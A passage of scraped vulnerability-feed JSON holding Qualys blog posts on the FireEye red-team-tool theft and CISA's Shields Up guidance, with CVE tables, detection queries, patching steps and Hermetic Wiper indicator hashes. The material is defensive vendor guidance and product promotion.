References\n\n<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>\n\n<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\n<https://us-cert.cisa.gov/ncas/current-activity/2020/10/20/nsa-releases-advisory-chinese-state-sponsored-actors-exploiting>", "cvss3": {}, "published": "2020-10-22T23:10:29", "type": "qualysblog", "title": "NSA Alert: Chinese State-Sponsored Actors Exploit Known Vulnerabilities", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2015-4852", "CVE-2017-6327", "CVE-2018-4939", "CVE-2018-6789", "CVE-2019-0708", "CVE-2019-0803", "CVE-2019-10149", "CVE-2019-1040", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2020-0601", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-2555", "CVE-2020-3118", "CVE-2020-5902", "CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8515"], "modified": "2020-10-22T23:10:29", "id": "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T00:22:53", "description": "**Update Jan 5, 2021**: New patching section with two new dashboard widgets showing the number of missing FireEye-related patches in your environment and the number of assets in your environment missing one of those patches.\n\n**Update Dec 23, 2020**: Added a new section on compensating controls.\n\n**Update Dec 22, 2020: **FireEye disclosed the theft of their Red Team assessment tools. Hackers now have an influential collection of new techniques to draw upon.\n\nUsing Qualys VMDR, the vulnerabilities for Solorigate/SUNBURST can be prioritized for the following Real-Time Threat Indicators (RTIs):\n\n * Active Attacks\n * Solorigate Sunburst (**New RTI**)\n\n\n**Original post**: On December 8, 2020, [FireEye disclosed](<https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html>) theft of their Red Team assessment tools. These tools are used by FireEye to test and validate the security posture of their customers. According to FireEye, the hackers now have an influential collection of new techniques to draw upon. It is unclear today if the attackers intend to use the tools themselves or if they intend to release the tools publicly in some way. \n\n\u201cThe attackers tailored their world-class capabilities specifically to target and attack FireEye. They are highly trained in operational security and executed with discipline and focus. They operated clandestinely, using methods that counter security tools and forensic examination,\u201d said Kevin Mandia, CEO of FireEye. However, the stolen tools did not contain zero-day exploits. \n\nIn response to the breach, FireEye has provided Red Team tool countermeasures which are [available on GitHub](<https://github.com/fireeye/red_team_tool_countermeasures>). These countermeasures include rules in multiple languages such as Snort, Yara, ClamAV and HXIOC. Since none of the leaked tools leverage zero-day attacks, FireEye also provided a [listing of CVEs](<https://github.com/fireeye/red_team_tool_countermeasures/blob/master/CVEs_red_team_tools.md>) used by these tools. \n\nAn analysis of these tools shows that the functionality and capabilities may mimic some existing red team tools such as Metasploit or Cobalt Strike. Similar to how the Shadow Brokers leak led to outbreaks such as WannaCry, it is possible that this breach could lead to other commodity malware leveraging these capabilities. Any time there is high-fidelity threat intelligence such as the countermeasures provided by FireEye, it is important to look at it under the lens of how you can protect your organization going forward, as well as how you can validate if this has been used in your organization previously. \n\n### Mitigation &amp; Protection \n\n[Snort](<https://www.snort.org/>) is an open-source intrusion prevention system (IPS) which uses an open format for its rule structure. While many companies use the open-source version of Snort, commercial IPS tools are also able to leverage the Snort rule format. Most of these rules are tuned to specifically look for beacon traffic or components of remote access tools. If your organization is using an IPS or IDS, you should plug in these signatures to look for evidence of future exploitation.\n\n[ClamAV](<https://www.clamav.net/>) is an open-source antivirus engine which is now owned by Cisco. To prevent these tools from executing on the endpoint, the provided signatures can be imported into this AV engine or any other antivirus which uses the ClamAV engine.\n\n[Yara](<https://github.com/VirusTotal/yara>) was designed by VirusTotal to help malware researchers both identify and classify malware samples. Yara can be used as a standalone scanning engine or built in to many endpoint security products as well. The provided rules can be imported into many endpoint security tools to match and block future execution of known malware.\n\nAnother important aspect for preventing the usage of these red teaming tools in your environment is to address the vulnerabilities they are known to exploit. There are 16 vulnerabilities which have been prioritized based on the CVSS score associated with them. Using a vulnerability management product such as [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can proactively search which endpoints or devices have these vulnerabilities and deploy patches or configuration fixes to resolve them before an adversary has a chance to exploit them. \n\n### Threat Hunting \n\nHunting for evidence of a breach is just as important as trying to prevent the breach. Two of the components FireEye released to help this search are HXIOC and Yara rules. These help define what triggers to look for to make the determination if the organization has been breached by these tools. \n\nThe HXIOC rules provided are based on the [OpenIOC](<https://github.com/mandiant/OpenIOC_1.1>) format originally created by Mandiant. These are similar to the STIX and CyBOX formats maintained by [OASIS](<https://www.oasis-open.org/committees/tc_home.php?wg_abbrev=cti>). The rules provided by FireEye call out many process names and associated command line arguments which can be used to hunt for the evidence of an attack. \n\nBy using the provided Yara rule which encompasses all of the Yara countermeasures, you can scan multiple directories using the standalone Yara engine by issuing the \u201cyara -r all-rules.yara &lt;path&gt;\u201d, where &lt;path&gt; is the location you want to recursively scan. \n\nAlternatively, VirusTotal also has a useful API called [RetroHunt](<https://support.virustotal.com/hc/en-us/articles/360001293377-Retrohunt>) which allows you to scan files submitted within the last 12 months. [Florian Roth](<https://twitter.com/cyb3rops/status/1336583694912516096>) has gone through and submitted all of the provided Yara rules to RetroHunt and created a [Google Sheets document](<https://docs.google.com/spreadsheets/d/1uRAT-khTdp7fp15XwkiDXo8bD0FzbdkevJ2CeyXeORs/edit>) containing all of the detections. In this document you can see valuable information such as the number of detections and file hashes for each of the detected samples. \n\n### Detect 16 Publicly Known Vulnerabilities using Qualys VMDR \n\nHere is a prioritized list of CVEs published on [Github](<https://github.com/fireeye/red_team_tool_countermeasures/blob/master/CVEs_red_team_tools.md>) by FireEye:\n\n**CVE** **ID**| **Name**| **CVSS**| **Qualys** **QID(s)** \n---|---|---|--- \nCVE-2019-11510| Pre-auth arbitrary file reading from Pulse Secure SSL VPNs| 10| 38771 \nCVE-2020-1472| Microsoft Active Directory escalation of privileges| 10| 91668 \nCVE-2018-13379| pre-auth arbitrary file reading from Fortinet Fortigate SSL VPN| 9.8| 43702 \nCVE-2018-15961| RCE via Adobe ColdFusion (arbitrary file upload that can be used to upload a JSP web shell)| 9.8| 371186 \nCVE-2019-0604| RCE for Microsoft Sharepoint| 9.8| 110330 \nCVE-2019-0708| RCE of Windows Remote Desktop Services (RDS)| 9.8| 91541, 91534 \nCVE-2019-11580| Atlassian Crowd Remote Code Execution| 9.8| 13525 \nCVE-2019-19781| RCE of Citrix Application Delivery Controller and Citrix Gateway| 9.8| 150273, 372305 \nCVE-2020-10189| RCE for ZoHo ManageEngine Desktop Central| 9.8| 372442 \nCVE-2014-1812| Windows Local Privilege Escalation| 9| 91148, 90951 \nCVE-2019-3398| Confluence Authenticated Remote Code Execution| 8.8| 13475 \nCVE-2020-0688| Remote Command Execution in Microsoft Exchange| 8.8| 50098 \nCVE-2016-0167| local privilege escalation on older versions of Microsoft Windows| 7.8| 91204 \nCVE-2017-11774| RCE in Microsoft Outlook via crafted document execution (phishing)| 7.8| 110306 \nCVE-2018-8581| Microsoft Exchange Server escalation of privileges| 7.4| 53018 \nCVE-2019-8394| Arbitrary pre-auth file upload to ZoHo ManageEngine ServiceDesk Plus| 6.5| 374547 \n \nQualys released several remote and authenticated QIDs for CVEs published by FireEye. You can search for these QIDs in VMDR Dashboard by using the following QQL query:\n\n_vulnerabilities.vulnerability.qid: [38771, 91668, 43702, 371186, 110330, 91541, 91534, 13525, 150273, 372305, 372442, 91148, 90951, 13475, 50098, 91204, 110306, 53018, 374547]_\n\n\n\n### Identify Vulnerable Assets using Qualys Threat Protection\n\nIn addition, Qualys customers can locate vulnerable host through [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) by simply clicking on the impacted hosts. This helps in effectively identifying and tracking these vulnerabilities. \n\n\n\nWith VMDR Dashboard, you can track these 16 publicly known vulnerabilities, their impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of these vulnerabilities trends in your environment using the [FireEye Theft Top 16 CVEs &amp; IOC Hashes](<https://qualys-secure.force.com/customer/s/article/000006470>) dashboard. \n\n \n\n### **Compensating Controls for Reducing Risk of Vulnerabilities Leveraged by FireEye Red Team Tools** \n\nTo reduce the overall security risk, it is important to address misconfigurations associated with the CVEs in addition to general security hygiene and system hardening. \n\nQualys customers can leverage the newly released policy \u201c_Compensating Controls for Reducing Risk of Vulnerabilities Leveraged by FireEye Red Team Tools_.\u201d This policy contains controls which can be used as workarounds / mitigations for these vulnerabilities if patching cannot be done immediately. \n\n**Control List: ** \n\nCVE IDs| Control ID | Statement \n---|---|--- \nCVE-2020-1472| 20002| Status of the &#x27;Domain controller: Allow vulnerable Netlogon secure channel connections&#x27; Group policy setting \nCVE-2018-13379 | 20010 | Status of the source interface setting for SSL-VPN \nCVE-2019-19781| 13952 | Status of &#x27;Responder&#x27; feature configured on the appliance \nCVE-2019-19781 | 20011 | Status of the responder action configured on the device \nCVE-2019-19781 | 20008 | Status of the responder policies configured on the device \nCVE-2019-19781 | 20009 | Status of the responder global binds configured on the device \nCVE-2016-0167 | 19440 | Status of Trust Center &quot;Block macros from running in Office files from the Internet&quot; setting for a user profile \nCVE-2018-8581 | 20007 | Status of the &#x27;DisableLoopbackCheck&#x27; setting \nCVE-2019-0708 | 10404 | Status of the &#x27;Require user authentication for remote connections by using Network Level Authentication&#x27; setting \nCVE-2019-0708 | 7519 | Status of the &#x27;Allow users to connect remotely using Remote Desktop Services (Terminal Services)&#x27; setting \nCVE-2019-0708 | 1430 | Status of the &#x27;Terminal Services&#x27; service \nCVE-2019-0708 | 3932 | Status of the &#x27;Windows Firewall: Inbound connections (Public)&#x27; setting \nCVE-2019-0708 | 3948 | Status of the &#x27;Windows Firewall: Inbound connections (Private)&#x27; setting \nCVE-2019-0708 | 3949 | Status of the &#x27;Windows Firewall: Inbound connections (Domain)&#x27; setting \nCVE-2019-0708 | 3950 | Status of the &#x27;Windows Firewall: Firewall state (Public)&#x27; setting \nCVE-2019-0708 | 3951 | Status of the &#x27;Windows Firewall: Firewall state (Private)&#x27; setting \nCVE-2019-0708 | 3952 | Status of the &#x27;Windows Firewall: Firewall state (Domain)&#x27; setting \nCVE-2019-0708 | 11220 | List of &#x27;Inbound Rules&#x27; configured in Windows Firewall with Advanced Security via GPO \nCVE-2017-11774 | 13843 | Status of the &#x27;Do not allow folders in non-default stores to be set as folder home pages&#x27; setting \nCVE-2017-11774 | 20003 | Status of the &#x27;EnableRoamingFolderHomepages&#x27; registry setting \nCVE-2017-11774 | 20004 | Status of the &#x27;Do not allow Home Page URL to be set in folder Properties&#x27; Group policy setting \n \nWith Qualys Configuration Management, you can easily identify misconfigured systems in context of these vulnerabilities. The screenshot below shows the total passing and failing controls for the impacted assets in the report.\n\n\n\nView control posture details with remediation steps. The screenshot below shows control pass/fail details along with actual evidence from impacted asset. \n\n\n\n### FireEye Disclosure of the Theft of their Red Team Assessment Tools \n\nHackers now have an influential collection of new techniques to draw upon. Qualys released a new RTI for Solorigate/SUNBURST vulnerabilities so customers can effectively prioritize these CVEs in their environment.\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), the vulnerabilities for Solorigate/SUNBURST can be prioritized for the following real-time threat indicators (RTIs):\n\n * Active Attacks\n * Solorigate Sunburst (**New RTI**)\n\n\n### Remediate FireEye-Related Vulnerabilities with Qualys Patch Management\n\n#### Identify and Install Needed Patches\n\nTo view the relevant missing patches in your environment that are required to remediate the vulnerabilities leveraged by the FireEye tools you may run the following QQL in the Patches tab of [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>):\n \n \n (qid: [91541,372442,38771,91534,91204,110330,371186,91148,90951,43702,374547,372305,110306,50098,91668,13475,53018,13525,150273])\n\n\n\nIt is highly recommended to select all the patches returned by this QQL and add them to a new on-demand patch job. You can then target as many assets as possible and deploy the patch job as soon as possible. Note that the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) will only deploy the right patch to the right asset, meaning the Qualys patch job will do the mapping of patch to asset (so you don\u2019t have to) ensuring only the right patch is deployed to the right asset (in terms of binary architecture, OS version, etc). In addition, if a patch is not needed by a specific asset the Qualys agent will \u201cskip\u201d this asset and the patch will not be deployed.\n\nThe same QQL can be used in the patch assets tab in order to see all the assets that miss at least one of the FireEye-related patches:\n\n\n\n#### Visualize Assets Requiring Patches\n\nQualys has created two dashboard widgets that you can import into the patch management dashboard. These widgets will show the number of missing FireEye-related patches in your environment and the number of assets in your environment missing one of those patches.\n\nSteps to Import the Widget:\n\n * Click on &quot;Setting&quot; icon in &quot;Dashboard&quot; section.\n * Select &quot;Import New Widget&quot; option.\n * Enter a name of your choice for the widget.\n * Browse the JSON file to import.\n * Click on &quot;Import&quot; button.\n * On success, you should see the new widget in your Dashboard.\n\nYou can download these two dashboard widgets from the PatchMGMT-Fireeye-Widgets attachment at the bottom of the [FireEye Theft dashboards](<https://qualys-secure.force.com/customer/s/article/000006470>) article. \n\n### Hunting in Endpoint Detection and Response (EDR) \n\nThere are two components to hunt for evidence of these tools using the [Qualys EDR](<https://www.qualys.com/apps/endpoint-detection-response/>). The first is looking for evidence of the files from the provided Yara signatures. Qualys has taken the file hashes from the RetroHunt tool and created a dashboard. With a single click you can find evidence of any matches in your environment. \n\nThe second component is hunting for evidence of the processes outlined in the OpenIOC signatures. While these signatures cannot be imported directly into Qualys EDR, the Qualys Labs team is converting these into Qualys Query Language (QQL) which can be used in the Qualys EDR hunting page. An example provided here shows hunting for [this Seatbelt signature](<https://github.com/fireeye/red_team_tool_countermeasures/blob/master/rules/BELTALOWDA/supplemental/hxioc/SEATBELT%20\\(UTILITY\\).ioc>). In the coming days, these hunting queries will be available to all Qualys EDR customers. \n\n\n\n\n\n### Get Started Now \n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) to automatically identify, detect and patch the high-priority publicly known vulnerabilities. \n\nStart your [Qualys EDR trial](<https://www.qualys.com/apps/endpoint-detection-response/>) to protect the entire attack chain, from attack and breach prevention to detection and response using the power of the Qualys Cloud Platform \u2013 all in a single, cloud-based app. \n\nStart your [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) trial to access the Live Threat Intelligence Feed that displays the latest vulnerability disclosures and maps them to your impacted IT assets. You can see the number of assets affected by each threat, and drill down into asset details. \n\n### References \n\n<https://github.com/fireeye/red_team_tool_countermeasures>\n\n<https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html>\n\n<https://github.com/fireeye/red_team_tool_countermeasures/blob/master/CVEs_red_team_tools.md>\n\n<https://www.fireeye.com/blog/threat-research/2020/12/unauthorized-access-of-fireeye-red-team-tools.html>", "cvss3": {}, "published": "2020-12-10T00:48:29", "type": "qualysblog", "title": "Solorigate/Sunburst : Theft of Cybersecurity Tools | FireEye Breach", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2014-1812", "CVE-2016-0167", "CVE-2017-11774", "CVE-2018-13379", "CVE-2018-15961", "CVE-2018-8581", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-19781", "CVE-2019-3398", "CVE-2019-8394", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-1472"], "modified": "2020-12-10T00:48:29", "id": "QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-04T01:27:17", "description": "**_CISA has created Shields Up as a response to the Russian invasion of Ukraine. Qualys is responding with additional security, monitoring and governance measures. This blog details how and what our enterprise customers can do to immediately strengthen their security posture and meet CISA\u2019s recommendations._**\n\nWith the invasion of Ukraine by Russia, the U.S. Cybersecurity &amp; Infrastructure Security Agency (CISA) has created a [program titled Shields Up](<https://www.cisa.gov/shields-up>) and provided specific guidance to all organizations. The Russian government has used cyber operations as a key component of force projection in the past and has targeted critical infrastructure to destabilize a governments\u2019 response capabilities. Critical infrastructure can include supply chain (including software supply chain), power, utilities, communications, transportation, and government and military organizations.\n\n### Protecting Customer Data on Qualys Cloud Platform****\n\nQualys is strongly committed to the security of our customers and their data. In addition to proactive risk mitigation with continuous patch and configuration management, we continually monitor all our environments for any indication of active threats, exploits and compromises. We hold our platforms to the highest security and compliance mandates like [FedRAMP](<https://blog.qualys.com/product-tech/2022/02/24/meet-fedramp-compliance-with-qualys-cloud-platform>). However, given the heightened risk environment around the globe, the Qualys Security and Engineering teams have been at a heightened state of vigilance in recent weeks. We continuously monitor our internal systems in this amplified threat environment. We are working with our security partners to access the latest threat intel. We have implemented additional security, monitoring, and governance measures involving our senior leadership and are committed to ensuring that the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>) remains available and secure to support the enterprises we serve worldwide.\n\n### Urgent: Assess and Heighten Your Security Posture\n\nBased on high-level guidelines provided by CISA, Qualys is recommending all organizations to establish the following actionable steps to adopt heightened cybersecurity posture to protect critical assets.\n\nThere are 4 steps necessary to strengthen security posture per CISA\u2019s Shields Up guidance: \n\n\n * Step 1: Know Your Shodan/Internet Exposed Assets Automatically\n * Step 2: Detect, Prioritize, and Remediate CISA&#x27;s Catalog of Known Exploited Vulnerabilities\n * Step 3: Protect Your Cloud Services and Office 365 Environment\n * Step 4: Continuously Detect a Potential Intrusion\n\n* * *\n\n****Implement CISA\u2019s Shields Up Guidance****\n\n[Try it Now](<https://www.qualys.com/forms/cisa-shields-up-service/>)\n\n* * *\n\n### Step 1: Monitor Your Shodan/Internet Exposed Assets \n\n\n#### Discover and protect your external facing assets \n\n\nAn organization\u2019s internet-facing systems represent much of their potential attack surface. Cyber threat actors are continuously scanning the internet for vulnerable systems to target attacks and campaigns. Often hackers find this information readily available on the dark web or in plain sight on internet search engines such as Shodan.io.\n\nInventory all your assets and monitor your external attack surface. [Qualys CyberSecurity Asset Management (CSAM)](<https://www.qualys.com/apps/cybersecurity-asset-management/>) provides comprehensive visibility of your external-facing IT infrastructure by natively correlating asset telemetry collected by Qualys sensors (e.g. Internet Scanners, Cloud Agents, Network Passive Sensors) and key built-in integrations such as [Shodan.io](<https://blog.qualys.com/vulnerabilities-threat-research/2021/12/20/qualys-integrates-with-shodan-to-help-map-the-external-attack-surface>) and Public Cloud Providers.\n\nOne of the biggest risks is unknown unknowns. These gaps in visibility happen for many reasons \u2013 including shadow IT, forgotten websites, legacy services, mergers &amp; acquisitions (M&amp;A), or simply because a development team exposes an application or database without informing their security team.\n\nCSAM enables you to continuously discover these blind spots and assess their security and compliance posture.\n\n\n\n#### Monitor Industrial Control Systems and Operational Technology\n\nNetwork segmentation traditionally kept Industrial Control Systems air-gapped. However, the acceleration of digital transformation has enabled more of these systems to connect with corporate as well as external networks, such as device vendors and Industrial IoT platforms. Further, the majority of Operational Technology utilizes legacy, non-secure protocols.\n\nBuild full visibility of your critical infrastructure, network communications, and vulnerabilities with Qualys Industrial Control Security (ICS).\n\n\n\n#### Detect and disable all non-essential ports and protocols, especially on internet exposed assets\n\nInventory your internal and external-facing assets, report open ports, and detected services on each port. Qualys CSAM supports extensive query language that enables teams to report and act on detected external facing assets that have a remote-control service running (for example Windows Remote Desktop). \n\n\n\n#### Ensure all systems are protected with up-to-date antivirus/anti-malware software****\n\nFlag assets within your inventory that are missing antivirus, or with signatures that are not up to date. CSAM allows you to define Software Rules and assign required software on a specific scope of assets or environment. For example, all database servers should have antivirus and a data loss prevention agent.\n\n\n\nVerify that your antivirus/anti-malware engine is up to date with the latest signatures.\n\n\n\nFor devices missing antivirus or anti-malware, [Qualys Multi-Vector EDR](<https://www.qualys.com/apps/endpoint-detection-response/>) with Integrated Anti-Malware can be easily enabled wherever the Qualys Cloud Agent is installed to provide immediate threat protection. In addition to basic anti-malware protection, Multi-Vector EDR will monitor endpoint activity to identify suspicious and malicious activity that usually bypasses traditional antivirus such as Living-off-the-Land attacks as well as MITRE ATT&amp;CK tactics and techniques.\n\n### Step 2: Detect, Prioritize and Remediate CISA&#x27;s Catalog of Known Exploited Vulnerabilities\n\nQualys Researcher analyzed all the 300+ CVEs from CISA known exploited vulnerabilities and mapped them to the Qualys QIDs. Many of these CVEs have patches available for the past several years. A new \u201cCISA Exploited\u201d RTI was added to VMDR to help customers create vulnerabilities reports that are focused on CISA exploited vulnerabilities. Customers can use the VMDR vulnerabilities page or VMDR prioritization page and filter the results to focus on all the \u201cCISA Exploited\u201d open vulnerabilities in their environment. \n\nFollowing are some of the critical vulnerabilities cataloged by CISA, as specifically known to be exploited by Russian state-sponsored APT actors for initial access include:\n\n**CVE**| **QID**| **Title**| **Release Date**| **CVSS_V3** \n---|---|---|---|--- \nCVE-2018-13379| 43702| Fortinet Fortigate (FortiOS) System File Leak through Secure Sockets Layer (SSL) Virtual Private Network (VPN) via Specially Crafted Hypertext Transfer Protocol (HTTP) Resource Requests (FG-IR-18-384)| 9/12/2019| 9.8 \nCVE-2019-2725| 87386| Oracle WebLogic Server Remote Code Execution Vulnerability (Oracle Security Alert Advisory - CVE-2019-2725)| 4/27/2019| 9.8 \nCVE-2019-7609| 371687| Kibana Multiple Security Vulnerabilities (ESA-2019-01,ESA-2019-02,ESA-2019-03)| 4/18/2019| 10 \nCVE-2019-10149| 50092| Exim Remote Command Execution Vulnerability| 6/5/2019| 9.8 \nCVE-2019-11510| 38771| Pulse Connect Secure Multiple Security Vulnerabilities (SA44101)| 8/6/2019| 10 \nCVE-2019-19781| 372305| Citrix ADC And Citrix Gateway Arbitrary Code Execution Vulnerability(CTX267027)| 12/23/2019| 9.8 \nCVE-2020-0688| 50098| Microsoft Exchange Server Security Update for February 2020| 2/12/2020| 9.8 \nCVE-2020-4006| 13215| VMware Workspace One Access Command Injection Vulnerability (VMSA-2020-0027)| 12/7/2020| 9.1 \nCVE-2020-5902| 38791| F5 BIG-IP ASM,LTM,APM TMUI Remote Code Execution Vulnerability (K52145254) (unauthenticated check)| 7/5/2020| 9.8 \nCVE-2020-14882| 87431| Oracle WebLogic Server Multiple Vulnerabilities (CPUOCT2020)| 10/21/2020| 9.8 \nCVE-2021-26855, CVE-2021- 26857 CVE-2021-26858, CVE-2021-27065 | 50107| Microsoft Exchange Server Remote Code Execution Vulnerability (ProxyLogon)| 3/3/2021| 9.8 \n \nSee the full list of [CISA known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\n#### Remediate CISA recommended catalog of exploited vulnerabilities \n\nFor all CISA cataloged vulnerabilities known to be exploited by Russian state-sponsored actors, [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>) customers can create a patch and configuration fix jobs to remediate the risk of all vulnerabilities directly from the VMDR console. Qualys Patch Management maps \u201cCISA Exploited\u201d vulnerabilities detected in the environment to the relevant patches required to remediate those vulnerabilities by downloading the patches without needing to go through the VPN. Customers may use Zero Touch patching to automate the process and ensure all CISA exploited vulnerabilities are automatically fixed including the new vulnerabilities added to the CISA catalog in the future. \n\n\n\n#### Monitor and ensure your software are always up to date\n\nImmediately know all end-of-support critical components across your environment, including open-source software. Qualys CSAM tracks lifecycle stages and corresponding support status, to help organizations manage their technical debt and to reduce the risk of not receiving security patches from the vendor. Security and IT teams can work together to plan upgrades ahead of time by knowing upcoming end-of-life &amp; end-of-support dates.\n\n\n\nUse the \u201cPrioritize Report\u201d function in Qualys Patch Management to map software in your environment to the security risk opposed. Prioritize your remediation efforts based on software that introduces the most risk. Use this report to create automated patch jobs to ensure that the riskiest software is always up to date. Alternatively, deploy individual patches for the riskiest software. \n\n\n\n### Step 3: Protect Your Cloud Services and Office 365\n\nAs noted by CISA, misconfiguration of cloud services and SaaS applications like Office 365 are the primary attack vector for breaches.\n\n#### Detect and Remediate Public Cloud Infrastructure Misconfigurations****\n\nProtect your public cloud infrastructure by securing the following services on priority:\n\n * **IAM**: Ensure all users are MFA enabled and rotate all access keys older than 30 days. Verify that all service accounts are valid (i.e. in use) and have the minimum privilege.\n * **Audit Logs**: Turn on access logging for all cloud management events and for critical services (e.g. S3, RDS, etc.)\n * **Public-facing assets**: Validate that the firewall rules for public-facing assets allow only the needed ports. Pay special attention to RDP access. Place any system with an open RDP port behind a firewall and require users to use a VPN to access it through the firewall.\n\n Automatically detect and remediate cloud misconfigurations using [Qualys CloudView](<https://www.qualys.com/apps/cloud-security-assessment/>).\n\n\n\n#### Protect your Office 365 and Other SaaS Services****\n\nEnforce multi-factor authentication on all accounts with access to Office 365 tenants. At a minimum, enable MFA for accounts with different admin access rights to the tenant. [Qualys SaaSDR](<https://www.qualys.com/apps/saas-detection-response/>) lists all such accounts on which MFA is disabled. Further, Qualys SaaSDR enables continuous security posture assessment of Office 365 via the CIS (Center for Internet Security) certified policy for Office, along with automated security configuration assessment for Zoom, Salesforce, and Google Workspace. This is based on an analysis of all security weaknesses, critical vulnerabilities, and exploits leveraged by attackers in historical attacks as well as security assessments based on the MITRE ATT&amp;CK framework.\n\n\n\n### Step 4: Continuously Detect any Potential Threats and Attacks \n\nMonitor for increases in suspicious and malicious activities as well as anomalous behavior on all endpoints. With Qualys Multi-Vector EDR, customers can detect Indicators of Compromise (IOC) and MITRE ATT&amp;CK Tactics &amp; Techniques provided by CISA and respond quickly to mitigate the risk by capturing process, file, and network events on the endpoint and correlating them with the latest Threat Intelligence, including new and upcoming Indicators of Compromise (IOC) constantly added by the Qualys Research Team. Anomalous endpoint behavior is detected and identified as MITRE ATT&amp;CK Tactics and Techniques.\n\n\n\nThe Appendix at the bottom of this post contains a list of Indicators of Compromise (IOC) and MITRE ATT&amp;CK Tactics &amp; Techniques being utilized.\n\n## Take Action to Learn More about How to Strengthen Your Defenses\n\nWe encourage you to learn more about how to strengthen your defenses consistent with CISA Shields Up guidelines using Qualys Cloud Platform. Join our webinar, [How to Meet CISA Shields Up Guidelines for Cyberattack Protection](<https://event.on24.com/wcc/r/3684128/0F6FB4010D39461FD4209A3E4EB8E9CD>), on March 3, 2022.\n\nQualys recommends that all organizations, regardless of size, heighten their security posture based on the above actionable steps, to protect critical cyber infrastructure from potential state-sponsored, advanced cyberattacks. Qualys Cloud Platform remains continuously committed to high standards of security and compliance to safeguard customer data. In this amplified threat environment, the entire Qualys team is available to help our customers improve cybersecurity and resilience.\n\n* * *\n\n****Implement CISA\u2019s Shields Up Guidance****\n\n[Try it Now](<https://www.qualys.com/forms/cisa-shields-up-service/>)\n\n* * *\n\n### **Appendix:**\n\n#### CISA catalog of known exploited vulnerabilities by state attackers\n\n**CVE**| **QID**| **Title**| **Release Date**| **CVSS_V3** \n---|---|---|---|--- \nCVE-2018-13379| 43702| Fortinet Fortigate (FortiOS) System File Leak through Secure Sockets Layer (SSL) Virtual Private Network (VPN) via Specially Crafted Hypertext Transfer Protocol (HTTP) Resource Requests (FG-IR-18-384)| 9/12/2019| 9.8 \nCVE-2019-1653| 13405| Cisco Small Business RV320 and RV325 Router Multiple Security Vulnerabilities| 1/29/2019| 7.5 \nCVE-2019-2725| 87386| Oracle WebLogic Server Remote Code Execution Vulnerability (Oracle Security Alert Advisory - CVE-2019-2725)| 4/27/2019| 9.8 \nCVE-2019-7609| 371687| Kibana Multiple Security Vulnerabilities (ESA-2019-01,ESA-2019-02,ESA-2019-03)| 4/18/2019| 10 \nCVE-2019-9670| 375990| Zimbra XML External Entity Injection (XXE) Vulnerability| 8/12/2021| 9.8 \nCVE-2019-10149| 50092| Exim Remote Command Execution Vulnerability| 6/5/2019| 9.8 \nCVE-2019-11510| 38771| Pulse Connect Secure Multiple Security Vulnerabilities (SA44101)| 8/6/2019| 10 \nCVE-2019-19781| 372305| Citrix ADC And Citrix Gateway Arbitrary Code Execution Vulnerability(CTX267027)| 12/23/2019| 9.8 \nCVE-2020-0688| 50098| Microsoft Exchange Server Security Update for February 2020| 2/12/2020| 9.8 \nCVE-2020-4006| 13215| VMware Workspace One Access Command Injection Vulnerability (VMSA-2020-0027)| 12/7/2020| 9.1 \nCVE-2020-5902| 38791| F5 BIG-IP ASM,LTM,APM TMUI Remote Code Execution Vulnerability (K52145254) (unauthenticated check)| 7/5/2020| 9.8 \nCVE-2020-14882| 87431| Oracle WebLogic Server Multiple Vulnerabilities (CPUOCT2020)| 10/21/2020| 9.8 \nCVE-2021-26855, CVE-2021- 26857 CVE-2021-26858, CVE-2021-27065 | 50107| Microsoft Exchange Server Remote Code Execution Vulnerability (ProxyLogon)| 3/3/2021| 9.8 \n \nSee the full list of [CISA known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\n#### List of IOCs related to Hermetic Wiper aka KillDisk\n\n**SHA256 Hashes** \n--- \n0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece21da \n06086c1da4590dcc7f1e10a6be3431e1166286a9e7761f2de9de79d7fda9c397 \n095c7fa99dbc1ed7a3422a52cc61044ae4a25f7f5e998cc53de623f49da5da43 \n0db5e5b68dc4b8089197de9c1e345056f45c006b7b487f7d8d57b49ae385bad0 \n1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591 \n2c10b2ec0b995b88c27d141d6f7b14d6b8177c52818687e4ff8e6ecf53adf5bf \n34ca75a8c190f20b8a7596afeb255f2228cb2467bd210b2637965b61ac7ea907 \n3c557727953a8f6b4788984464fb77741b821991acbf5e746aebdd02615b1767 \n4dc13bb83a16d4ff9865a51b3e4d24112327c526c1392e14d56f20d6f4eaf382 